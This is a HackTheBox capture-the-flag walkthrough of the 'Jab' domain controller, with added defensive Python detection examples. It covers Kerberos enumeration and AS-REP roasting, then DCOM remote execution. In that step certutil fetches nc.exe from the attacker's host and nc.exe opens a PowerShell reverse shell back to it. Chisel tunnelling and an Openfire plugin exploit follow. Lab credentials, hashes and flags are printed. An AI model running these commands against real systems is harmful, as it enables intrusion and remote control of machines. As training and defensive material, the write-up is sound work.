HackTheBox | Jab

In this walkthrough, I demonstrate how I obtained complete ownership of Jab on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Medium Challenge

Nmap Results


# Nmap 7.94SVN scan initiated Tue Feb 27 12:31:36 2024 as: nmap -Pn -p- --min-rate 2000 -A -oN nmap.txt 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.012s latency).
Not shown: 65503 closed tcp ports (reset)
PORT      STATE SERVICE             VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-02-27 17:32:00Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-02-27T17:34:46+00:00; 0s from scanner time.
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-27T17:34:45+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
5222/tcp  open  jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     compression_methods: 
|     features: 
|     stream_id: 2w1nsbkqd
|     xmpp: 
|       version: 1.0
|_    capabilities: 
|_ssl-date: TLS randomness does not represent time
5223/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     unknown: 
|     compression_methods: 
|     features: 
|     xmpp: 
|_    capabilities: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5262/tcp  open  jabber
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     compression_methods: 
|     features: 
|     stream_id: 1luyjkdr8f
|     xmpp: 
|       version: 1.0
|_    capabilities: 
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     unknown: 
|     compression_methods: 
|     features: 
|     xmpp: 
|_    capabilities: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     unknown: 
|     compression_methods: 
|     features: 
|     xmpp: 
|_    capabilities: 
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5275/tcp  open  jabber
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     compression_methods: 
|     features: 
|     stream_id: qj9t3bq52
|     xmpp: 
|       version: 1.0
|_    capabilities: 
5276/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     unknown: 
|     compression_methods: 
|     features: 
|     xmpp: 
|_    capabilities: 
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  realserver?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 17:32:00 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 17:32:05 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp  open  ssl/oracleas-https?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 17:32:06 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Tue, 27 Feb 2024 17:32:11 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
7777/tcp  open  socks5              (No authentication; connection not allowed by ruleset)
| socks-auth-info: 
|_  No authentication
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49669/tcp open  msrpc               Microsoft Windows RPC
49670/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc               Microsoft Windows RPC
49672/tcp open  msrpc               Microsoft Windows RPC
49677/tcp open  msrpc               Microsoft Windows RPC

Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-27T17:34:34
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   13.23 ms 10.10.14.1
2   13.28 ms 10.10.11.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 27 12:34:47 2024 -- 1 IP address (1 host up) scanned in 191.67 seconds

We can see the references to DC01.jab.htb and jab.htb in the nmap output. Let's go ahead and get those added to our /etc/hosts file.

echo '10.10.11.4        DC01.jab.htb jab.htb' | sudo tee -a /etc/hosts





Service Enumeration

TCP/53

DNS returns NXDOMAIN for jab.htb even though LDAP advertises that domain, so moving on



TCP/139,445

Anonymous login successful, but no enumerable shares
ℹ️
Noting the successful anonymous login, I tried SMB Null session enumeration of usernames via RID cycling, but did not have permissions to make RPC calls.



TCP/88

Let's see if we can enumerate any valid usernames using Kerberos pre-authentication requests.

Kerberos Pre-Auth User... | 0xBEN | Notes
tr 'A-Z' 'a-z' < /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt | sort -u > kerberos_users.txt

Generate the username list

kerbrute userenum -d jab.htb --dc 10.10.11.4 -t 1000 -o kerbrute.log ./kerberos_users.txt

Reduce the thread count (-t) to suit your environment

Tons and tons of matches!
1646 potential usernames
AS-REP Roasting (Inter... | 0xBEN | Notes
grep '@' kerbrute.log | awk -v FS=' ' '{print $7}' | cut -d '@' -f 1 > as_rep_list.txt

Generate a list of usernames to test for AS-REP roasting

impacket-GetNPUsers -usersfile as_rep_list.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
$krb5asrep$23$mlowe@JAB.HTB:feb912709fedfdb00ee8461dd2d8d579$0e57db329bf1fceedd7aeb9f903794f464315745d264a18c411bd6e72bcb34415b7814af12f3a3b8f146ddd3fb6cbd482181631bd85d8a3a749cde4da82ce245f632c32ce5bb97ad24f6d0aa38bcc01b23f5de781537a0fabb74e69617b228f979904959b43dd0d7207d90192d16af5603b156d8a8773c350d72714bc06c874430cf1df31995d164b9d5a129c868a53eace8375c3ea4234231e08ed74e2a4e0a073a7f5dcbf10264c681131258b163791d9ae653cbd08421497d7d878857401af6e19596e621529d10f48ec20ab0e54f21f7e150af8658c56819b92a2aacdb99c4aa

The user 'mlowe' appears to be AS-REP roastable

echo '$krb5asrep$23$mlowe@JAB.HTB:feb912709fedfdb00ee8461dd2d8d579$0e57db329bf1fceedd7aeb9f903794f464315745d264a18c411bd6e72bcb34415b7814af12f3a3b8f146ddd3fb6cbd482181631bd85d8a3a749cde4da82ce245f632c32ce5bb97ad24f6d0aa38bcc01b23f5de781537a0fabb74e69617b228f979904959b43dd0d7207d90192d16af5603b156d8a8773c350d72714bc06c874430cf1df31995d164b9d5a129c868a53eace8375c3ea4234231e08ed74e2a4e0a073a7f5dcbf10264c681131258b163791d9ae653cbd08421497d7d878857401af6e19596e621529d10f48ec20ab0e54f21f7e150af8658c56819b92a2aacdb99c4aa' > as_rep_hash
john --wordlist=rockyou.txt as_rep_hash

Let's see if we can crack it using 'rockyou.txt'

Does not appear to be in the 'rockyou.txt' word list (also tested other word lists)



TCP/5222

I'm not familiar with the steps needed to enumerate the Jabber attack surface, but looking at the nmap output, it seems the Jabber (XMPP) server has bound to multiple ports including tcp/5223, tcp/5262, tcp/5263, tcp/5275, tcp/5276, tcp/7070, tcp/7443.

Let's start by asking Google for some information.

Researching Jabber Enumeration

jabber pentest - Google Search
XMPP service is an underappreciated attack surface for pen testers
Misconfigured XMPP (aka Jabber) servers may not be the most common service you encounter during pen tests, but they can prove very valuable. Read more.

Lots of good information here



Connect with a Jabber Client

The article referenced above uses the Pidgin XMPP client, so that's what we'll use.

sudo apt install -y pidgin
Click 'Add...'
Click 'Add'
Click 'View Certificate...' to ensure the correct server and click 'Accept'
Click 'Accounts > Manage Accounts'
Enable your account
Go to 'Accounts > user@jab.htb > Search for users..'
Run a wildcard search



Exporting the User List

There isn't a clear way of exporting the usernames from this user search function, so we'll have to get creative.

Click 'Help > Debug Window'
Set the filter and log level accordingly
Search by email only
We've got usernames! Click 'Pause' to stop logging. Then, save the log file.
grep -oE '[A-Za-z0-9]+@jab\.htb' jabber.log | grep -v 'ben@jab.htb' | sort -u > jabber_emails.txt
cut -d '@' -f 1 jabber_emails.txt > jabber_usernames.txt

Get all emails from the log and filter out my own username, then create a username list



AS-REP Roast with the New List

diff as_rep_list.txt jabber_usernames.txt | grep '>' | awk -v FS=' ' '{print $2}' > jabber_as_rep.txt

We're going to AS-REP roast again, but only on names that are unique to Jabber

impacket-GetNPUsers -usersfile jabber_as_rep.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
Nice! We've got two more hashes we can try and crack!
john --wordlist=rockyou.txt as_rep_hashes.txt
Excellent! We have a credential we can test with now!
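As an added example (not the author's commands), here is the defender's view of the two Kerberos steps used in this section and in the TCP/88 section: a small Python check over constructed Event ID 4768 records that flags the enumeration burst and the TGT issued without pre-authentication. The IP addresses and account names are placeholders modelled on the walkthrough.

```python
"""Defensive counterpart to the two Kerberos steps above: username
enumeration with kerbrute and AS-REP roasting with GetNPUsers. Added
example, not the author's tooling. It scores Windows Security Event ID
4768 (a TGT was requested) records as a SIEM presents them after parsing.
Every record below is constructed; field names follow the Windows event
schema, the values are invented."""

# Placeholder source address, modelled on the walkthrough's attacker host.
ATTACKER_IP = "::ffff:10.10.14.181"


def tgt_event(user, ip, status, preauth, etype):
    """Minimal 4768 record. Status is the Kerberos result code (0x0 success,
    0x6 KDC_ERR_C_PRINCIPAL_UNKNOWN); PreAuthType 2 = PA-ENC-TIMESTAMP
    (normal), 0 = no pre-auth; TicketEncryptionType 0x12 = AES256,
    0x17 = RC4-HMAC."""
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth,
            "TicketEncryptionType": etype}


SAMPLE_4768 = (
    # wordlist sweep: each nonexistent name yields 0x6 from one source in a burst
    [tgt_event(f"guess{i:04d}", ATTACKER_IP, "0x6", "-", "-") for i in range(60)]
    # legitimate workstation logon: pre-auth used, AES ticket
    + [tgt_event("jmontgomery", "::ffff:10.10.11.50", "0x0", "2", "0x12")]
    # AS-REP roast: TGT issued with no pre-auth and an RC4 session key
    + [tgt_event("mlowe", ATTACKER_IP, "0x0", "0", "0x17")]
    # a few typos from a normal client: stays below the burst threshold
    + [tgt_event("jmontgomry", "::ffff:10.10.11.50", "0x6", "-", "-")] * 3
)


def find_enum_sources(events, threshold=20):
    """Return {ip: distinct_unknown_names} for sources that asked for TGTs of
    at least `threshold` different nonexistent accounts. One client rarely
    mistypes dozens of names; 'kerbrute userenum' does exactly that."""
    names_by_ip = {}
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == "0x6":
            names_by_ip.setdefault(e["IpAddress"], set()).add(e["TargetUserName"])
    return {ip: len(names) for ip, names in names_by_ip.items()
            if len(names) >= threshold}


def find_asrep_roastable(events):
    """Return (user, ip, etype) for every TGT issued without pre-authentication
    (successful 4768 with PreAuthType 0). Those accounts carry the
    DONT_REQ_PREAUTH flag GetNPUsers looks for; the fix is to clear that flag.
    RC4 (0x17) tickets crack fastest offline, so they are listed first."""
    hits = [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"])
            for e in events
            if e["EventID"] == 4768 and e["Status"] == "0x0"
            and e["PreAuthType"] == "0"]
    return sorted(hits, key=lambda h: h[2] != "0x17")


if __name__ == "__main__":
    for ip, n in find_enum_sources(SAMPLE_4768).items():
        print(f"[enum]  {ip} requested TGTs for {n} nonexistent accounts")
    for user, ip, etype in find_asrep_roastable(SAMPLE_4768):
        print(f"[asrep] {user}: TGT issued with no pre-auth (etype {etype}) to {ip}")
```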



Adding the Jabber Account

Accept the server certificate
Click 'Tools > Room List'
Click 'Get List'
Open the 'pentest2003' room
We find a password for the 'svc_openfire' SPN
⚠️
I tried spraying this password around with a few tools, but didn't find anything too useful. Let's enumerate LDAP with the jmontgomery credential and see who has access to what.



TCP/3269

ldapdomaindump -u 'JAB.HTB\jmontgomery' -p 'Midnight_121' -o ldd ldaps://dc01.jab.htb:3269
open ldd/domain_users_by_group.html
pentest distributed com - Google Search
DCOM Exec - HackTricks
pentest dcom kali - Google Search
139,445 - Pentesting SMB - HackTricks
impacket dcomexec | WADComs
# Check help output for usage
impacket-dcomexec -h
impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'ping 10.10.14.181'





Exploit

DCOM Exec to Reverse Shell

cp /usr/share/windows-resources/binaries/nc.exe .                        

Copy the on-system 'nc.exe' binary to the current directory

sudo python3 -m http.server 80

Host 'nc.exe' over HTTP

impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'certutil -f -urlcache -split http://10.10.14.181/nc.exe C:\Windows\Tasks\nc.exe'

Use DCOM to download 'nc.exe' to the target

We can see the target has successfully grabbed the file
sudo rlwrap nc -lnvp 443

Start a TCP listener

impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'C:\Windows\Tasks\nc.exe 10.10.14.181 443 -e powershell.exe'

Use DCOM to run a PowerShell reverse shell over the 'nc.exe' socket
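For the blue-team side of the DCOM step, here is an added Python example (not the author's code) that runs three process-creation rules over constructed Sysmon Event ID 1 records mirroring the commands above: a child of a DCOM-hosted mmc.exe, execution from the C:\Windows\Tasks staging directory, and a certutil download. Paths, users and command lines are placeholders.

```python
"""Endpoint-side detection for the DCOM technique used in this section
(impacket-dcomexec with the MMC20.Application object). Added example, not
the author's code. ExecuteShellCommand on MMC20 makes the DcomLaunch
service start 'mmc.exe -Embedding', and that mmc.exe then spawns the
requested command; an interactive user never launches mmc.exe that way.
The records are constructed Sysmon Event ID 1 (process creation) fields
modelled on the commands run above; the values are invented."""
import ntpath

# World-writable staging directory the walkthrough used for nc.exe (lowercase
# for matching). Legitimate binaries are not executed from here.
STAGING_DIR = "c:\\windows\\tasks\\"


def proc_event(image, cmdline, parent_image, parent_cmdline, user):
    """Minimal Sysmon Event 1 record with the fields the rules need."""
    return {"EventID": 1, "Image": image, "CommandLine": cmdline,
            "ParentImage": parent_image, "ParentCommandLine": parent_cmdline,
            "User": user}


MMC_DCOM = (r"C:\Windows\System32\mmc.exe", r'"C:\Windows\system32\mmc.exe" -Embedding')
EXPLORER = (r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE")

SAMPLE_PROC_EVENTS = [
    # dcomexec: certutil staging nc.exe under C:\Windows\Tasks
    proc_event(r"C:\Windows\System32\cmd.exe",
               r"cmd.exe /c certutil -f -urlcache -split http://10.10.14.181/nc.exe C:\Windows\Tasks\nc.exe",
               *MMC_DCOM, r"JAB\svc_openfire"),
    # dcomexec: the staged binary launched as a child of the same mmc.exe
    proc_event(r"C:\Windows\Tasks\nc.exe",
               r"C:\Windows\Tasks\nc.exe 10.10.14.181 443 -e powershell.exe",
               *MMC_DCOM, r"JAB\svc_openfire"),
    # benign: an admin opens an MMC console from the desktop
    proc_event(r"C:\Windows\System32\mmc.exe", r'"C:\Windows\system32\mmc.exe" dsa.msc',
               *EXPLORER, r"JAB\administrator"),
    # benign: an interactive command prompt
    proc_event(r"C:\Windows\System32\cmd.exe", r'"C:\Windows\system32\cmd.exe"',
               *EXPLORER, r"JAB\jmontgomery"),
]


def basename(path):
    return ntpath.basename(path).lower()


def rule_dcom_mmc_child(e):
    """Any child of an mmc.exe that DCOM started with the -Embedding switch."""
    return (basename(e["ParentImage"]) == "mmc.exe"
            and "-embedding" in e["ParentCommandLine"].lower())


def rule_staging_dir_exec(e):
    """Execution of, or a command line referencing, C:\\Windows\\Tasks."""
    haystack = (e["Image"] + " " + e["CommandLine"]).lower()
    return STAGING_DIR in haystack


def rule_lolbin_download(e):
    """certutil -urlcache fetching content over HTTP (a LOLBin download)."""
    cl = e["CommandLine"].lower()
    return "certutil" in cl and "-urlcache" in cl and "http" in cl


RULES = {"dcom_mmc_child": rule_dcom_mmc_child,
         "staging_dir_exec": rule_staging_dir_exec,
         "lolbin_download": rule_lolbin_download}


def evaluate(events):
    """Return [(rule_name, image_basename, user)] for every rule that fires."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append((name, basename(e["Image"]), e["User"]))
    return hits


if __name__ == "__main__":
    for name, image, user in evaluate(SAMPLE_PROC_EVENTS):
        print(f"[{name}] {image} run by {user}")
```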





Post-Exploit Enumeration

Operating Environment

OS & Kernel

WindowsBuildLabEx                                       : 17763.1.x86fre.rs5_release.180914-1434
WindowsCurrentVersion                                   : 6.3
WindowsEditionId                                        : ServerStandard
WindowsInstallationType                                 : Server
WindowsInstallDateFromRegistry                          : 1/1/1970 12:00:00 AM
WindowsProductName                                      : Windows Server 2019 Standard
WindowsRegisteredOwner                                  : Windows User
WindowsSystemRoot                                       : C:\Windows
WindowsVersion                                          : 1809
TimeZone                                                : (UTC-05:00) Eastern Time (US & Canada)
PowerPlatformRole                                       : Desktop
DeviceGuardSmartStatus                                  : Off

Current User

USER INFORMATION
----------------

User Name        SID                                         
================ ============================================
jab\svc_openfire S-1-5-21-715914501-2118353807-243417633-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                        
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users               Alias            S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled    



Users and Groups

See ldapdomaindump data.



Network Configurations

Network Interfaces

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.11.4
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2    

Open Ports

127.0.0.1:9090         0.0.0.0:0              LISTENING       3192
127.0.0.1:9091         0.0.0.0:0              LISTENING       3192    



Interesting Files

C:\Program Files\Openfire\conf\openfire.xml

  <adminConsole> 
    <!-- Disable either port by setting the value to -1 -->  
    <port>9090</port>  
    <securePort>9091</securePort>  
    <interface>127.0.0.1</interface> 
  </adminConsole>      





Privilege Escalation

In the post-exploit enumeration steps, we found a couple of ports listening internally on tcp/9090 and tcp/9091 and we can further see that it's associated with process ID 3076. We can see these TCP ports referenced as the Openfire admin console ports in openfire.xml.

Port 9090 (tcp/udp)

Let's transfer chisel.exe to the target, so we can forward those ports.

Port Forwarding with C... | 0xBEN | Notes

I just used the download_chisel function referenced in my notes above to download both chisel and chisel.exe.

sudo python3 -m http.server 80

Start a web server to host chisel.exe over HTTP

iwr -useb http://10.10.14.181/chisel.exe -o C:\Windows\Tasks\chisel.exe

Download chisel.exe in our reverse shell

sudo ./chisel server --port 8081 --reverse &

Start the chisel server in the background on Kali

impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'C:\Windows\Tasks\chisel.exe client 10.10.14.181:8081 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091'

Use DCOM to remotely start the process

The 'svc_openfire:!@#$%^&*(1qazxsw' credentials work here as well
We can see there is a way to upload plugins in .jar format
openfire ”.jar” shell - Google Search
This Metasploit module generates a malicious .jar, but the exploit can't be used against this target, so let's do some further Googling
cve-2023-32315 .jar - Google Search
Let's see what we can do with this .jar file
wget https://github.com/miko550/CVE-2023-32315/raw/main/openfire-management-tool-plugin.jar -O plugin.jar
Upload the plugin
Go to Server > Server Settings > Management Tool
Enter password '123'
Choose 'system command' from the menu
sudo rlwrap nc -lnvp 443

Start a TCP listener

Use the existing 'nc.exe' binary on the box to connect
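The openfire.xml fragment found during post-exploit enumeration is what made this path possible: a loopback-only admin console is still one port forward away once an attacker has a foothold. As an added example (not the author's or Openfire's code), this Python audit parses the adminConsole block and reports the weak settings beside a hardened variant; both XML documents are constructed, the first mirroring the fragment on the box.

```python
"""Configuration audit for the Openfire admin console reached above.
Added example, not the author's or Openfire's code. It parses the
<adminConsole> block of openfire.xml: a port of -1 disables that listener
(as the file's own comment says) and <interface> restricts the bind
address. Both documents below are constructed: AS_FOUND mirrors the
fragment found on the box, HARDENED is a tightened variant."""
import xml.etree.ElementTree as ET

AS_FOUND = """<jive>
  <adminConsole>
    <!-- Disable either port by setting the value to -1 -->
    <port>9090</port>
    <securePort>9091</securePort>
    <interface>127.0.0.1</interface>
  </adminConsole>
</jive>"""

HARDENED = """<jive>
  <adminConsole>
    <port>-1</port>
    <securePort>9091</securePort>
    <interface>127.0.0.1</interface>
  </adminConsole>
</jive>"""


def audit_admin_console(xml_text):
    """Return a list of human-readable findings for the admin console."""
    console = ET.fromstring(xml_text).find("adminConsole")
    if console is None:
        return ["no <adminConsole> element: Openfire defaults apply"]

    def text(tag):
        node = console.find(tag)
        return node.text.strip() if node is not None and node.text else None

    plain, secure, iface = text("port"), text("securePort"), text("interface")
    findings = []
    if plain not in (None, "-1"):
        findings.append(f"plaintext admin console enabled on {plain}: "
                        "set <port>-1</port> and keep only securePort")
    if secure == "-1" and plain in (None, "-1"):
        findings.append("admin console fully disabled")
    if iface in (None, "0.0.0.0"):
        findings.append("admin console bound to all interfaces: "
                        "set <interface>127.0.0.1</interface>")
    elif iface.startswith("127."):
        findings.append("loopback binding: reachable through a port forward from "
                        "any foothold on the host, so the admin credential and "
                        "plugin upload are the controls that matter")
    return findings


if __name__ == "__main__":
    for label, doc in (("as found", AS_FOUND), ("hardened", HARDENED)):
        print(f"== {label} ==")
        for f in audit_admin_console(doc):
            print(" -", f)
```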



Flags

User

cbe0287bba2a7a8b60575f9fbc09ee44    

Root

97c1833cc7ea11ba52044b004bb51f1b    